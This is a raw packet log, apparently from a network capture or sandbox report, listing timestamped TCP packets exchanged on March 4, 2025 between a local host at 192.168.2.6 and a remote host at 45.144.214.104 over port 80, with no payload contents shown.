Mar 4, 2025 09:35:22.286243916 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.286298037 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.286309004 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.286345005 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.286453009 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.286465883 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.286478043 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.286485910 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.286520004 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.286560059 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.286570072 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.286581993 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.286603928 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.286616087 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.286628962 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.286688089 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.286704063 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.286715984 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.286760092 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.286782026 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.286792994 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.286822081 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.286894083 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.286911964 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.286926031 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.286936045 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.286946058 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.286963940 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.287000895 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.287043095 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.287064075 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.287075996 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.287113905 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.287164927 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.287290096 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.287337065 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.287358046 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.287370920 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.287410021 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.287426949 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.287712097 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.287734032 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.287745953 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.287756920 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.287789106 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.287833929 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.287847996 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.287889004 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.287988901 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.288002968 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.288018942 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.288031101 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.288038015 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.288052082 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.288062096 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.288111925 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.288151979 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.288240910 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.288254023 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.288266897 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.288279057 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.288305044 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.288316965 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.416275978 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.416307926 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.416322947 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.416341066 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.416353941 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.416372061 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.416384935 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.417231083 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.417258024 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.417278051 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.417287111 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.417300940 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.417325974 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.417336941 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.417392969 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.417452097 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.417464972 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.417485952 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.417503119 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.417510986 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.417526007 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.417560101 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.417573929 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.417586088 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.417618036 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.417701960 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.417714119 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.417749882 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.417782068 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.417793989 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.417808056 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.417819977 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.417851925 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.417860985 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.417871952 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.417884111 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.417910099 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.418107986 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.418121099 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.418133020 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.418144941 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.418180943 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.418198109 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.418353081 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.418369055 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.418390036 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.418404102 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.418416977 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.418427944 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.418440104 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.418473959 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.418648958 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.418667078 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.418682098 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.418694019 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.418705940 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.418713093 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.418720007 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.418862104 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.418903112 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.418932915 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.418948889 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.418962955 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.418976068 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.418991089 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.419018030 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.546787024 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.546801090 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.546813011 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.546844959 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.546889067 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.546901941 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.546912909 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.546947956 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.546971083 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.546982050 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.547578096 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.547629118 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.547636032 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.547648907 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.547662020 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.547683954 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.547840118 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.547852039 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.547866106 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.547878027 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.547887087 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.547904968 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.547924995 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.547936916 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.547982931 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.548003912 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.548028946 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.548042059 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.548051119 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.548080921 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.548161030 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.548233032 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.548247099 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.548275948 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.548464060 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.548476934 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.548490047 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.548505068 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.548516989 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.548525095 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.548532963 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.548583984 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.548604965 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.548666954 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.548679113 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.548708916 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.548732996 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.548779964 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.549000025 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.549055099 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.549067020 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.549099922 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.549149036 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.549161911 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.549197912 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.549216032 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.549261093 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.549268961 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.549279928 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.549312115 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.549422026 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.549437046 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.549462080 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.549473047 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.549485922 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.549495935 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.549510002 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.549576044 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.549591064 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.549612999 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.597841024 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.677959919 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.677978992 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.677994013 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.678037882 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.678085089 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.678097963 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.678122044 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.678132057 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.678144932 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.678185940 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.685101986 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.685127974 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.685163021 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.685192108 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.685204983 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.685239077 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.685264111 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.685275078 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.685297012 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.685306072 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.685316086 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.685359001 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.685530901 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.685543060 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.685554981 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.685568094 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.685578108 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.685595989 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.685697079 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.685709000 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.685722113 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.685736895 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.685743093 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.685767889 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.685885906 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.685897112 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.685909033 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.685924053 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.685930967 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.685945034 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.685970068 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.685983896 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.686191082 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.686203957 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.686214924 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.686230898 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.686242104 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.686253071 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.686265945 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.686274052 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.686280012 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.686291933 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.686300039 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.686309099 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.686355114 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.686398983 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.686557055 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.686614990 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.686626911 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.686660051 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.686708927 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.686719894 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.686760902 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.738445997 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.808453083 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.808471918 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.808484077 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.808510065 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.808578014 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.808588982 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.808599949 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.808612108 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.808654070 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.808680058 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.808904886 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.808952093 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.808959961 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.808969021 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.809015989 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.809073925 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.809083939 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.809097052 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.809112072 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.809123039 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.809156895 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.809206009 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.809247971 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.809267998 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.809293032 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.809392929 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.809451103 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.809588909 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.809631109 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.809642076 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.809720993 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.809726000 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.809782028 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.809811115 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.809820890 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.809828043 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.809834957 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.809915066 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.810003042 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.810014963 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.810020924 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.810026884 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.810033083 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.810038090 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.810141087 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.810753107 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.810764074 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.810775995 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.810803890 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.810851097 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.810862064 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.810873985 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.810887098 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.810895920 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.810911894 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.811093092 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.811105013 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.811115980 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.811125994 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.811140060 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.811150074 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.811157942 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.811167002 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.811178923 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.811186075 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.811237097 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.939165115 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.939181089 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.939203024 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.939214945 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.939235926 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.939244032 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.939290047 CET	49709	80	192.168.2.6	45.144.214.104
Mar 4, 2025 09:35:22.939388037 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.939398050 CET	80	49709	45.144.214.104	192.168.2.6
Mar 4, 2025 09:35:22.939409971 CET	80	49709	45.144.214.104	192.168.2.6
